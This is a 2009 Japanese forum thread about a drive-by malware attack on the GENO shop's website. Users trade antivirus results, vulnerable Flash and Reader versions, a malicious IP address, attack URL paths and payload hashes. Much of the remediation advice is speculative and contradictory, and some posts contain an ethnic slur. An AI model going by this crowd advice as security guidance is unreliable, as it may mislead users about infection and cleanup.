204 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 20:41:57.11 ID:aSggnVt/
>>201 バスターは、日本にラボがあるから初心者には本当に心つおいな
207 :
モッコウバラ(長屋) :2009/04/07(火) 20:43:49.21 ID:QdzM1ljl
>>204 おれのESSはいつ対応してくれるんだろう・・・
208 :
アグロステンマ(徳島県) :2009/04/07(火) 20:44:06.37 ID:hgNnCMLs
GENO、被害届けを出してないんじゃないのか? 利用者をなめているとしか思えない。。。
209 :
ラフレシア(東京都) :2009/04/07(火) 20:45:55.33 ID:Yn6ot/oR
>>202 何処で踏んだのさ?
リンクいらんからスレ名とレス番教えてほしい
211 :
ビオラ(静岡県) :2009/04/07(火) 20:46:00.20 ID:gWsZdmKF
>>200 昨日カスペとトレンドマイクロのオンラインスキャンを両方かけて感染無しだったが
夜中にa-squared の完全スキャンをかけたまま寝て、あさおきたらTrojan-Spy.Agent!IK がありましたと出た。
普段はAVGなので当然未対応 orz
ちなみにgenoや怪しいURLは全く踏んでいない。
何を信じたらいいのかわからん。
>>199 SP3でCドライブ残量1.8Gだけど今スキャンし始めた
>ちなみにgenoや怪しいURLは全く踏んでいない。 ワロタ馬鹿かおまえ
あ、オンラインスキャン後は怪しいURLは全く踏んでいないに訂正。
215 :
ツボスミレ(愛知県) :2009/04/07(火) 20:53:03.37 ID:8snfBFzh
キタ━━━━━━(゚∀゚)━━━━━━ !!
ウイルスバスターとかノートン先生よりネタ扱いされるアンチウイルスソフト
キタ*・゜゚・*:.。..。.:*・゜(゚∀゚)゚・*:.。. .。.:*・゜゚・*!!!!!
218 :
ホトケノザ(dion軍) :2009/04/07(火) 20:53:43.24 ID:5XUI3fZx
>>210 覚えてない
ロリコン自重汁のスレだったか、もう1000いったエロ漫画家の話題で盛り上がってたスレのどっちかだったような気がするけど
ついさっきこのスレ開いて今回の騒動知ったから、そのときは気にしてなくて記憶にないんだよね…
ラ━━━━━━ヽ(´∀`ヽ)━━━━━━ン !!!!!
コネ━━━━━━(>△<)━━━━━━ !!!!!
>>211 >>12 のリストの一番上に、
>>211 のトロイの名前があって流石にワロタ
引っかかったファイルをもう一回、カスペにかけて見ればいいんじゃね?
部分チェックなら早く終わるだろ。
コォ━━━━щ(゚Д゚щ)━━━━イ!!!!
>>107 そのアドレスをスレイプニルのアドレスバーに入力すると私のCドライブの中身が見れてしまいました
これはインターネットから私のパソコンのデータがが丸見えと言うことでしょうか
助けてください!
224 :
キンケイギク(アラバマ州) :2009/04/07(火) 21:02:46.71 ID:+W+mjgtI
Cドライブがデフラグできない真っ赤かになったよありがとう おかげで丸1日かけてソフト入れなおし
GENOCIDEアナザーを正規ハードAAAでワンモア出ます
GENO 2−3日放置してたんだから被害者であるが加害者だわ。
やっとカスペのオンラインスキャンが始まった。 50MBくらいなのにDBの更新に1時間以上かかった。
>>218 じゃいいや
短縮アドレスはわかるけど偽造?がよくわからんから見たかっただけだし
>>224 かなり初期にそういう報告があったね
無数にPDFを開こうとする際に領域確保だけしまくるのか
わからんけども
ついでに今後はソフトを最新のものにアップデートするように心がけてね
9時だぞ日替わりセール見に行かなくていいのか
斧偽装みたことないんだよなあ
>>230 わかったわthx
どうみても短縮じゃないか
斧っぽいとか興奮してドメインちゃんと見てないのか
今日セールらしいけど、これでまた感染者呼ぶの?
vistaでavastさんなんだが 感染してるっぽい でもどうすればいいのかまったくわからん><
>>230 ああそういうやり方か
斧っぽいアドレスで飛ばすんかと思って気になってたw
239 :
ニオイタチツボスミレ(滋賀県) :2009/04/07(火) 21:17:50.04 ID:DAYpHc74
241 :
ホトケノザ(dion軍) :2009/04/07(火) 21:20:09.07 ID:5XUI3fZx
カスペで完全スキャンしてウイルスらしいものは検出されなかったんだけど 感染してないと考えていいの?
Vistaは大丈夫、っていう話だけど 今回のウイルスの特徴からいえば何ら根拠なくね?
244 :
カタバミ(愛媛県) :2009/04/07(火) 21:22:30.38 ID:ZVkcNftH
実はデスクトップ画像を集めるだけのウィルスだったりして 作者も祭りになっててビックリ
それならむしろ作者が集まった画像のZIPうpでおk
Spybotやアンチウイルスソフトがまったく起動できずに windowsupdataもできない、オンラインスキャンもまったく役に立たない HijackThisでも痕跡がまったくない そんな奴はComboFix、地味に1回まじで助かった
>>242 OSいれなおせばいいとおもうよ
>>243 UserAgentで判断してるかもっつー話があったから
VistaでもUA偽装してたら意味ないな
249 :
タツタソウ(神奈川県) :2009/04/07(火) 21:27:41.65 ID:+vLYUvLe
ウィルスバスタ pupup[1].js TROJ_GENOME.BK 検知したんだが IEの履歴を見るとgenoは3/31が最終アクセスだった これって感染してるの? どうしよう
adobeAcrobatとAdobe Flashに感染させて.exeを置くステルスタイプだから 別段VistaとXPじゃ変わらなくね?っていう話
2スレ目にこんなのあったけど同じ体験した人いんの? 510 名前: シンビジューム(大阪府)[sage] 投稿日:2009/04/05(日) 16:34:02.94 ID:G8VueaaE avast!で知らずに踏んだらAcrobat勝手に立ち上がったと思ったらavast!が警告出した。 ファイルを移動させて確認するとdosのコマンド?らしきファイルとEXEの二つのファイルが隔離されてた。 改めてそのそのファイルを検査すると警告がでた。 気持ち悪いのでavast!のフルスキャンかけたら、当然のごとく移動したファイルで警告出したから削除。 プロセス確認するもcmd.exeもconime.exeの起動もなし。 なんかすっきりしねぇ。
まだウイルス放置してるの?
253 :
セキショウ(長屋) :2009/04/07(火) 21:29:06.56 ID:joAw9Nrh BE:69998764-PLT(12203)
カスペルのオンラインスキャンで、
\Temporary Internet Files\Content.IE5\K5I3G5A3\jquery[1].js に
感染:Trojan-Downloader.JS.Agent.dwf が見つかったんで
インターネット一時ファイル削除してもう一回スキャンしたら
感染:Trojan-Downloader.JS.Agent.dwf は出なくなったんだけど
これって発症はしてないってことでいいのかな?
adobe reader/flashは最新版だったし
>>243 UAをNT 5.1にしたら感染したって話もある
なんか、今回のウイルスは一枚岩とは行きそうにないんだよな いろいろごっちゃになっていてどうなってるか3日経った今でも分かってない
256 :
サポナリア(愛知県) :2009/04/07(火) 21:30:25.85 ID:i6gnM1Fe
>>249 バスターは関係無いのまでGENOと誤検出するようだから
他のでチェックしてみた方が良いよ
avast noscript vistaの俺は大勝利をおさめたといったところか・・・ 池田先生万歳
258 :
キバナスミレ(関東・甲信越) :2009/04/07(火) 21:31:48.44 ID:TCaFGay6
>>249 それ誤検出じゃなかったっけ?
バスター使ってないからわからんけど
このスレはアンサイクロペドフィリアに監視されています
バスターはやめとけ
むずかしい用語よくわかんない
262 :
イワザクラ(西日本) :2009/04/07(火) 21:33:19.75 ID:Osz0BGWd
JR等壊してきたシステムバスターは信用出来ない
conime.exeは4日以前もうちのPCのプロセス一覧にいたんだけど こいつは感染の目安になるの? それまでもAVGとVBオンラインスキャンで定期的にチェックしてたけど 検出されたウィルスはなかった。
264 :
コバノランタナ(千葉県) :2009/04/07(火) 21:34:56.45 ID:hD4R3NI8
>>249 誤検知の可能性もゼロじゃないけど感染していると見た方が良いかもしれないね。
てか、3/31の最終アクセスが正しいとするとまた妙な話だよね。
>>261 お前ははやくCドライブをフォーマットする作業に入れよ
>>249 今携帯だから上手く貼れないが
トレンドマイクロが6日に同社セキュリティ対策製品へ提供したウイルス定義ファイルの一部で、誤検知の不具合が発生した。
同社では問題を解消した定義ファイルの提供を開始している。
6日午前中に提供が開始されたパターンファイル「5.945.00」において、「TROJ_GENOME.BK」を誤検知する問題が発生したもの。
インターネットでは、Q&Aサイトやブログなどを中心に、検出に関する投稿が寄せられていた。
同社では同日夜に問題を解消した定義ファイル「5.947.00」の公開を開始しており、
「TROJ_GENOME.BK」を検出した場合は、アップデート後に再度検出状況を確認してほしいとアナウンスしている。
>>261 OSいれなおせ
という意味がわからないならPC投げ捨ててください
捨てたくないならせめてネットへつながないでください
LANケーブル抜けますか?わからないならコンセントぬいてください
269 :
キバナスミレ(岡山県) :2009/04/07(火) 21:36:58.72 ID:DJGoGyVr
とりあえずniftyのスキャンしたら見つかった。 AVGたんちゃんと仕事してくれよ・・・
conime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.execonime.exe conime.execonime.exe conime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.execonime.execonime.exe conime.execonime.execonime.exe
>>265 どうも
俺は↓のを参考にして言ってみた
274 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/04/07(火) 16:19:00.03 ID:2LVvXzfi0 (PC)
PC通販ショップのサイトがクラックされて罠サイト化してるらしいね。
オープンプロクシにもなっていたっぽい。
短縮URLサービスを悪用して偽装したリンクをあちこちのスレに貼って
回ってるやつがいるから、2ch内で流行中。
JavaScript、Flash、PDFを経由してexeを仕込むようなので、
Flash Player、Adobe ReaderのバージョンチェックとFirefox+NoScriptなどの
防御が重要。
Flash Playerは10.0.22.87、Adobe Readerは9.1になっていないと危険。
Flash PlayerはIE用とそれ以外のブラウザ用の両方を確認する必要がある。
SecuniaのPersonal Software Inspector(PSI)で各種インストール済みソフトの
バージョンチェックもお勧め。
ソースは2chだから
>>265 の方が信憑性は高いか
272 :
タツタソウ(神奈川県) :2009/04/07(火) 21:38:05.00 ID:+vLYUvLe
>>267 5.949.00 での検出です pupup.jsが残っていたと思うんだけど
これも感染してた?
感染してるのか分からないのが怖いな
感染した奴はいろいろ監視しつつ何か異変に気づいたら 逐一スレに報告するんだ
275 :
福寿草(長屋) :2009/04/07(火) 21:41:10.40 ID:t3+dPwOp
conime.exeがどうとか言ってるやつは2ちゃん見る前に勉強して来いよ
276 :
タツタソウ(神奈川県) :2009/04/07(火) 21:41:14.51 ID:+vLYUvLe
オンラインスキャンでわかるところってどこかある? 今ウィルスバスターの全件検索ちゅう。 こわいから他のところでもチェックしたい。
277 :
クレマチス(埼玉県) :2009/04/07(火) 21:41:47.04 ID:dqr+GOkP
>>271 265もその元ネタも指摘してる部分は一緒だぞ
おまえの「感染させて」という言い回しがおかしいだけ
手っとり早いのはリカバリ
>>271 だいたいあってる
どこにもAcrobatとFlashに感染させるなんて書いてないよ
実際情報錯綜しててどれが正しいかなんてわからんとおもう
Genoがやられてるのは1種類じゃないかもしれないし
ああいうのは日々進化してるから実験場にされてるかもしれない
ただいえることは各種ソフトを最新にすることは
重要だよってことくらいじゃないかな
とりあえず、簡易検知(除去)ツールくれぇぇぇぇぇ。
>>276 どこでもいいけど同時にスキャンするのはおすすめしない
282 :
クレマチス・モンタナ(北海道) :2009/04/07(火) 21:43:42.14 ID:CWnPkqk+
flash playerについて試してみた。IE6/2k。 やっぱりこのswfは flash player 9.0.115.0 以前に存在する脆弱性を利用したもの。 9.0.115.0でswfを読み込んでみたが、実行ファイルがダウンロードされコマンドプロンプトが立ち上がる。 9.0.124.0 以上であれば何も起こらず、攻撃は失敗するようだ。
284 :
タツタソウ(神奈川県) :2009/04/07(火) 21:44:06.01 ID:+vLYUvLe
IEの履歴に 94.247.2.195がなければ大丈夫?
>>283 ありがとう、 かたっぱしからやってきます。
286 :
ラフレシア(東京都) :2009/04/07(火) 21:45:28.21 ID:Yn6ot/oR
トップページで仮の対処法ぐらい書いとくのが常識のある店 バカGENOは非常識だからメンテ中でシラを切るトンデモ会社w
やばい、俺も感染してるかもしれん 4月1日から仕事がない
とりあえずカスペオンラインでCドライブのスキャン完了。 専ブラのログに張られたウィルスコードと大昔に入れて忘れてた洒落のexeが引っかかった。 今回の一件は大丈夫だったってことだろうか。。。 すでに疑心暗鬼状態なので何を信じていいのかわからない状態w
289 :
シナミズキ(アラバマ州) :2009/04/07(火) 21:46:59.70 ID:JlV6cTZL
Flashは最新でReaderは1個前だったんだが。だいじょーぶかなあ? あとFirefoxで履歴にGeno踏んでるのはわかったんだがいつ踏んだかわかるっけ? ここ1~2週間PCパーツ探しでいろいろなとこ踏んだからタイミングよく踏んだ可能性があるわ。ぐぐってた最初のほうで踏んでたならいいけど。
>>282 情報サンクス
やはりPDFだけじゃなかったか
>>282 あれ?初期とかわってね?
初期はPDFだったような・・・
ちょっとログあさってくる
>>272 バスターの検出だけでは何とも言えない。実際誤検出していたみたいだし
とりあえずしばらくは様子見するか、カスペ等のオンラインスキャンをするか
やはり気持ち悪いと思うならクリーンインスコするとか
294 :
ペチュニア(長屋) :2009/04/07(火) 21:49:45.15 ID:PkmMlTGo
クアドコアだとCPUの負荷が高くても気付きにくいので最強
295 :
コバノランタナ(千葉県) :2009/04/07(火) 21:49:48.07 ID:hD4R3NI8
>>278 うんうん。
急がば回れだね。
無い頭をフル回転して無駄に時間が過ぎる位なら
とっとと手間を惜しまずにリカバリしたりクリーンインストールするのが安心確実。
ごめん フラッシュも最初からいってました。てへっ。
>>291 news/?id=2 がPDFで
news/?id=3 がswf
ダブルで攻撃だよ
で 感染してると、どうなるの? 知らないexeがたちあがるん?
299 :
サポナリア(愛知県) :2009/04/07(火) 21:50:57.12 ID:i6gnM1Fe
>>289 履歴とブックマーク管理で
表示→表示する→最後に表示した日時
で解ると思う
301 :
イワザクラ(西日本) :2009/04/07(火) 21:51:58.02 ID:Osz0BGWd
GENO,お前だけは許さない
geno界は恐ろしいところじゃのう・・
304 :
シナミズキ(アラバマ州) :2009/04/07(火) 21:52:54.10 ID:JlV6cTZL
>>299 サンクス。先月の22日だったわ・・・・。あぶねーw
305 :
コスミレ(関東・甲信越) :2009/04/07(火) 21:52:59.73 ID:cZ2ABlUJ
まだ治まってないのか
>>297 news/?id=10か10?か100でhogehoge.exe
斧のLa.exe、まだ残ってやがるw
>>308 いろんなとこにばらまいてるやつがいる。vipにも飛び火してる
もうダメだな、田代砲よーい!
>>297 news/?id=2に飛んでPDF起動しながったんだけどこれはなんなの?
>>311 ランダムに生成されるから数は増えるかも知れんけど中身は同じだと思う。
AdobeReadeの8.1.4なら問題ないんだよね?
最新Verは9.1じゃないの
>>313 初回アクセスがVistaならPDF返してこないよ
初回アクセスがXPならそのあとにVistaでアクセスしてもPDF返してくる
319 :
オンシジューム(北海道) :2009/04/07(火) 22:09:01.58 ID:KblsCqrO
再起動したけど何の問題もなし
短縮URLってどんなの?
>>314 ファイルサイズもハッシュも違うんだが・・・改良してないか?
324 :
キクザキイチゲ(dion軍) :2009/04/07(火) 22:11:36.86 ID:zh168+8n
価格.comのときはどうだったの?
325 :
パンジー(コネチカット州) :2009/04/07(火) 22:16:04.83 ID:f81CfeGe
さっきからどのブラウザもすげー重くなって、殆んどのサイトが開かない状態なんだが、 短縮系のURLか何か踏んじゃったのかな これ感染してクソ重くなる事ってある? 今はカスペの完全スキャン中、今日電車でばーさんに席譲ったから感染してないでくれ
genoアウトレットはエラーが修正されたみたい。 こんな時くらい、すべてのページでお詫びを載せるのが常識だろうに。
>>325 メモリとういかページングファイルがおかしなことになってないか
>>196 Pwn2Own 2009とはまた別の大会?
330 :
コスミレ(東京都) :2009/04/07(火) 22:19:07.73 ID:8y99Mpqc
>>326 残念だが、昨日もエラーはすぐ修正されてた。
と思ったらまた書き換えられると言うイタチごっこだった。
また書き換えられる可能性が高い。見ないことに越したことはない。
331 :
ギシギシ :2009/04/07(火) 22:19:13.07 ID:llriVCjF
genoは直ったのか?
332 :
ラフレシア(東京都) :2009/04/07(火) 22:20:02.31 ID:Yn6ot/oR
いまごろは 「うちも被害者なんです><」(ウチに来る客なんてバカだからコレで解決だろ(・∀・)ニヤニヤ) って思ってるんだろうなw
>>323 もう一回?id=10踏んだら今度は"f9.exe"で、VirusTotalに献上しようと
落としたらZoneAlarmが「Trojan.Win32.Agent.caajだぞ」反応しおった・・・
>>320 8.1.4はAdobe Reader 9.1より新しい日付でアップデートが公開されてるんだけど。
それでもだめなんでしょうか。
>>334 ___ ━┓
/ ―\ ┏┛
/ノ (●)\ ・
. | (●) ⌒)\
. | (__ノ ̄ |
\ /
\ _ノ
/´ `\
| |
| |
___ ━┓
/ ― \ ┏┛
/ (●) \ヽ ・
/ (⌒ (●) /
/  ̄ヽ__) /
. /´ ___/
| \
| |
しかしWeb管理してる会社はどこよ? 酷すぎる。この様な事態に陥ったらSorryサーバ代替で立てて、 元のサーバはケーブルひっこぬくのが常識だろ。
338 :
ショウジョウバカマ(東日本) :2009/04/07(火) 22:26:15.30 ID:svdgoK2l
>>334 大丈夫だよ。Ver.8、Ver.9それぞれで脆弱性対応版が出ている。
8.1.4は対応版。
ま、俺も偉そうにレスするようなご身分じゃないんだが・・・
昨日クリーンインストールしてさっきやっと全部のパッチかけ終わったw
339 :
カラタネオガタマ(東京都) :2009/04/07(火) 22:26:52.96 ID:T+ZBdjlc
俺完全に感染してるけどトレンドマイクロのオンラインスキャンでまったく検知できない OS再インストールしたりパーティションいじくったりフォーマットしたりしても まだ残ったまんまなんだが orz ちなみに感染したパソコンは3週間前にGENOでかったやつw フロッピーとか手元にないし明日HDDの安いやつでも祖父で買う GENOどうしてくれるの?
>Adobe Reader 9.1へのアップグレードを望まないAdobe Readerユーザの方に対しては、 >Adobe Reader 8.1.4アップデートおよびAdobe Reader 7.1.1アップデートを用意しています。 って書いてあるからどっちでもいいってことか
>>263 「conime.exe が・・・」
コマンドラインで操作した憶えがないのなら、ネット上のボットからトロイが
感染したした疑いがあります。感染対策をしていない貴方の振る舞いはボット
そのものです。GENOと大差ありません。
レジストリを以下のように変更することで、 conime.exe を無効にできます。
コマンドプロンプトで日本語入力することは、まず無いから。
「HKEY_CURRENT_USER\Console\LoadConIme」の値を「0」に変更 (デフォルトは「1」)
最低限できる対策。
Flashも同様にVer9でも最新ならおkかな?
>>333 てことはLa.exeと同じものか。
8lv.exeは旧バージョンのウイルスなのか?
>>339 全パーティションフォーマットしたのかい
347 :
オダマキ(アラバマ州) :2009/04/07(火) 22:29:32.97 ID:RVO46BVa
>>336 何回か見たレスだけど何で同じことしか言わんのよ
348 :
クワガタソウ(兵庫県) :2009/04/07(火) 22:30:14.08 ID:ccuf3sBW
今うっかりjava切らない形で楽天踏んだけど楽天で駄目なのはパソコン関連のところだけだよな?
349 :
コバノランタナ(千葉県) :2009/04/07(火) 22:30:15.68 ID:hD4R3NI8
>>345 このexeを保存する時にファイル名をランダムで生成して保存するんで、
ファイルの中身は同じだけど、踏んだ奴の数だけファイル名が存在するって事。
350 :
ラフレシア(東京都) :2009/04/07(火) 22:30:54.18 ID:Yn6ot/oR
>>347 GENOのウンコ社員でしょ、責任回避の定例カキコw
>>336 sorry鯖立てなくても、ケーブル引っこ抜いておけば、
「あれ、geno落ちてない?」「落ちてるね」って会話で終わったと思う。
で、穴塞いで復活して目玉商品の一つも出せば「復活キタ--」で、メデタシだたのに。
今は、恥の上塗りが過ぎて、例えようの無い状態になってる。
>>347 え?俺、この内容でのカキ子はしてないよ・・・
>>350 geno社員が鯖管してる可能性も大。
354 :
エイザンスミレ(関西地方) :2009/04/07(火) 22:33:23.83 ID:F2Rc4kud
>>342 conimeを起動できなくすることで何の防御効果があるっての?
AVASTの更新きた
残しといたLa.exeも一瞬でZAに削除された。 昨日から報告が増えて処理対象に昇格したんかね?
357 :
ペチュニア(長屋) :2009/04/07(火) 22:36:22.28 ID:PkmMlTGo
自社鯖じゃない筈だけど
IT SOLUTIONは、システム開発までっぽい。 あとはロリポだとか、自分でレン鯖借りて設置してる。 みんなそれぞれのレン鯖使ってるね。
GENOの今日の特価品が気になる!
360 :
フモトスミレ(東京都) :2009/04/07(火) 22:37:31.25 ID:V61PjGML BE:728406757-2BP(8000)
GENOってもうメンテ終わったの?
誰かGENOの今日の特価品スクリーンショット貼っておくれ
なんだメンテ中なのか
メンテなんて やメンテ なんちゃって
jquery.jsっていくつかみつかったんだけど ウィルスに感染してるやつはどう判別すればいい?
>>349 ファイル名がランダム生成というのは理解しているが
最初に報告されたものと最近のexeとはファイルサイズとハッシュが違う。
だから、改良されたウイルスが出てくる可能性があるのでは?
>>355 トンクス
俺のavastは自動更新が効かなくなり、本体からの更新もできないので、
サイトまで行ってダウンロードして手動で更新してる。
WindowsUpdateやるとIEがフリーズしたまま、何も起こらない。
マジ、俺のマシンやばいね。
368 :
キンケイギク(アラバマ州) :2009/04/07(火) 22:41:15.26 ID:+W+mjgtI
店名がジェノサイドのジェノだし わざとやったんだろ
370 :
アグロステンマ アゲラタム(アラバマ州) :2009/04/07(火) 22:43:23.62 ID:F3zLYXU/
今日のAviraやる気出し過ぎ V7.01.03.26
ゲノって読むんやろ?
>>364 【審議中】
_,,..,,,,_ _,,..,,,,_
_,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_
./ ・ω_,,..,,,,_ l _,,..,,,,_/ω・ ヽ
| / ・ヽ /・ ヽ l
`'ー--l ll l---‐´
`'ー---‐´`'ー---‐´
結局のとこウイルスが怖くて今もGENOのHP踏めないチキンばっかし チキンじゃねーよってやつは今行ったっていう証拠出せ!! もちろん俺はチキンだが(´・ω・`)
>株式会社GENO(ジェノ)は常にお客様の立場で考え、
375 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 22:46:41.04 ID:aSggnVt/
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=122.212.38.0/24 Network Information: [ネットワーク情報]
(長いので省略)
上位情報
----------
株式会社UCOM (UCOM Corp.)
[割り振り] 122.208.0.0/12
下位情報
----------
株式会社 ウェブドゥジャパン (Web Do Japan Co.,Ltd.)
CROOZ-SRVS [割り当て] 122.212.38.0/25
ワイデンアンドケネディジャパン・エル・エル・シー (WIDEN and KENNEDY JAPAN L.L.C.)
WKJPN [割り当て] 122.212.38.128/28
株式会社 フェアーウェイ (FairWay Co.,Ltd.)
FAIRWAYNET05 [割り当て] 122.212.38.144/28
有限会社 スタジオコンクエスト (STUDIO CONQUEST)
TK0009600106 [割り当て] 122.212.38.160/28
broadgate (broadgate)
TK0038500107 [割り当て] 122.212.38.176/28
GENOのホスティングやってるのUSENらしいわ。broadgateか。
TOPはずっとメンテ中の表示でしょ ただ直リンで以下のどのページも見れるという・・・?
377 :
サトザクラ(dion軍) :2009/04/07(火) 22:48:30.47 ID:ly823CjS
前やってたネトゲでゲノって呼ぶと怒るキチガイ思い出した
GENOって最近躍進してる会社だよね? こんな不祥事起こして残念だな。
いまフラッシュから落とされたexe(wJQs.exe)が今までと違ってた。 Aviraはスルー MD5: 39509969d4b8bbe9ccb3d5e47f262e87 不正命令とかエラーになって実行できなかった。SP3だからかな。
avast更新来たけど斧に上げてくれたLa.exeには反応しないな
383 :
シロウマアサツキ(長屋) :2009/04/07(火) 22:56:44.35 ID:B8emn0Ws
USEN(朝鮮企業確定)もGENO(出自不明)もお互い譲らず金の亡者だということ
385 :
ウンナンオウバイ(dion軍) :2009/04/07(火) 22:57:47.40 ID:i9xZlP+J
genoのipどれ?
で、この事件はいつ終息するん?
>>380 すまんバイナリ覗いたら中身は例のクッキーだった
世界のジェノサイド の歴史に新たな1ページを書き加えたGENOだった
単刀直入に どうなってたら感染してるって言える?
GENOへのリンクを未だ消してないブログやアフィサイトが多いな
>>388 X68000用のジェノサイドでもやるか・・・
392 :
ポピー(アラバマ州) :2009/04/07(火) 23:03:28.22 ID:/PdA7gPs
>>391 あのゲームはかっこよかったな・・・
音楽が特に・・・
チェックかけて反応が出たら。
>>389 ラトビアにアクセスしてるかしようとしてたら
395 :
ウンナンオウバイ(dion軍) :2009/04/07(火) 23:04:26.44 ID:i9xZlP+J
つーか、前までジェノサイド無料で後悔してたが消えたな x68000 biosも無料で後悔されてるから、実記無でもできたのに
396 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 23:04:38.30 ID:aSggnVt/
IE立ち上げたらラトビアと交信
397 :
コスミレ(東京都) :2009/04/07(火) 23:05:08.94 ID:8y99Mpqc
>>386 GENOのサイトはこれからも書き換えられるから問題は全く収束しない。
しかも、セキュティーホールがadobeだから、WindowsUpdateとかで
全て網羅的に対応するってこともできない。本人が意識して行動しないと
いけない。普通の人にそれムリだから。ウイルスに感染したことも
理解してないと思う。気の毒。
firefoxでAcrobatReaderが8.1.2でFlashPlayerのバージョンは不明な 環境です。 ルータのログから1度はラトビアには行ったようなんだけど、 青画面もないし、レジストリのauxも大丈夫みたいなんで、 感染していないかなって思ってるんだけど、 大丈夫なこともあるのかな? いまのところ念のためLAN抜いた状態なんだけど、 FlashPlayerのバージョン調べる方法はある?
399 :
ツボスミレ(東京都) :2009/04/07(火) 23:06:21.59 ID:KovRB3Kt
>>398 Adobeにバージョン確認用ページがある
GENOはなかったことにするつもりなのか?
おいおいまだ解決してないのかよ!
ラトビアに行ってるのに今さらバージョン調べて何になるの?
ラトビアに連れて行ってもらえるのですか?いいですね
今USENとGENOはお互いに意地の張り合いみたいなことしてるけど、 今のような対応が続けば間違いなく致命的なダメージを受ける側は、 GENOに決まってるわな、そこのところ分かってるのかなあ? つーか、金の亡者の産廃業者に人倫的な対応求めること自体無理か
>>399 右下って・・・
まだ感染中なのか・・・?
ttp://www.uploda.org/ うpろだ.org 跡地
このサイトは、運営者の都合により閉鎖されました。
1760日(4.819年)もの間、ご利用ありがとうございました。
需要があるか分かりませんが、時間を捻出できれば、
アップローダで補助的に使用していた小物スクリプトを公開したいと思っております。
メールアドレス
[email protected] 2004/06/12 - 2009/04/07
413 :
ドデカテオン メディア(catv?) :2009/04/07(火) 23:13:40.01 ID:FwthmTsl
>>399 ノートン先生って ”安全” って言い切るのか、すごい自信だな。
415 :
イワザクラ(西日本) :2009/04/07(火) 23:14:42.92 ID:Osz0BGWd
GENOの「今日の特価品(だっけ?)」はすごい安いから毎日楽しみにしてる
417 :
コスミレ(東京都) :2009/04/07(火) 23:15:19.41 ID:8y99Mpqc
>>398 コンパネのプログラムの追加と削除から
サポート情報を参照するには、ここをクリックしてください のとこ
420 :
ドデカテオン メディア(catv?) :2009/04/07(火) 23:17:38.15 ID:FwthmTsl
無かったことにするだろうな。 今まで通り客が来てくれれば謝る必要なんてない。 2ちゃんごときで騒がれても痛くもかゆくもないだろう。
芸能人ブログの痛発言とかも大概なかったことにするよNE
spybotってなにしてるんすかね
とは言え、こんな何が仕掛けられているのか分からない、 これからも色々な罠が仕掛けられる可能性が高く、またそれを防ごうともせず、 さらには利用すると悪用する気満々の奴に個人情報を抜かれる店で 買い物をしたがる変態なんているのか?
>>401-403 >いまのところ念のためLAN抜いた状態なんだけど、
>FlashPlayerのバージョン調べる方法はある?
こいつらバカだろ
>>418 ローカルで確認したいんで助かります。
>>406 よくわからんけど、geno踏んだらとりあえずは
ラトビアに行くんじゃないのかな。
そのあと感染するかは環境次第かなって思ってる。
ここまで放置されるのが不思議でならない
avast対応してねえの?
>>425 まずフラッシュプレイヤーが何か判ってないに100ペソ
javascriptでとばされるんじゃないの?
メンテおわったな。お詫びがでてる
433 :
ペチュニア(長屋) :2009/04/07(火) 23:33:09.76 ID:PkmMlTGo
隠すようにお詫びが出てるwww
このウイルス、ただラトビアにトラフィックを飛ばしてるだけで実は無害なんじゃね? と思えてくる今日この頃
お客様へ 4月4日、4月7日に当社のwebサイトに外部より不正アクセスが有り、一部のプログラムに不具合が生じ、当社のHP以外のページへリンクされる状態が発生しました。ご迷惑をおかけし申し訳ございません。 現在は外部からのアクセスができないように対処いたしました。 現在すべてのプログラムは正常となっております。 すべてのプログラムチェックの為、復旧に時間がかかりましたことを重ねてお詫び申し上げます。 又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。 ・インターネットエクスプローラー6をご利用のお客様 ・インターネットエクスプローラー7をご利用のお客様 ・Firefoxをご利用のお客様 尚、サーバーのウィルス感染や個人情報の流失はございません。 今後はセキュリティーの強化を更に徹底いたします。 このたびは多大なるご迷惑をおかけし申し訳ございませでした。 今後ともよりいっそうのお買い得商品の提供に邁進する所存でございます。 GENOwebを引き続きよろしくお願い申し上げます。 2009年4月7日 web通販ショップ GENO
>尚、サーバーのウィルス感染や個人情報の流失はございません 工エエェェ(´д`)ェェエエ工
441 :
シナノコザクラ(新潟県) :2009/04/07(火) 23:36:00.48 ID:hrmBorNA
なん・・・だと?
bitdefenderは対応した_?
使ってないセレ800マシンに3回目のXPクリンインスト 3度目genoに突撃してきます もちろんノーガードだ もう中毒になってるわw
なんだ、キャッシュクリアするだけでいいのか
寝ようとした時良いタイミングでメンテ終わりやがった
※経費削減のため弊社のセキュリティソフトはソースネクストのウイルスセキュリティZEROを使用しています
447 :
コバノランタナ(千葉県) :2009/04/07(火) 23:37:44.04 ID:hD4R3NI8
キャッシュクリアだけでは直らないだろw
恐くて踏めないけど、今日の特化知りたい奴 【4/7 21:00】限定40枚 DDR PC3200(400MHz) 512MB メジャーチップ (184pin) 良品中古 デスク用 [商品番号] GA06517680 [販売価格] 799 円 [ポイント] 1 [在庫数] 40 お一人の注文数に限りがあります。最大注文数[2] だ、まあ他の商品も更新してあるし、見たほうが微妙
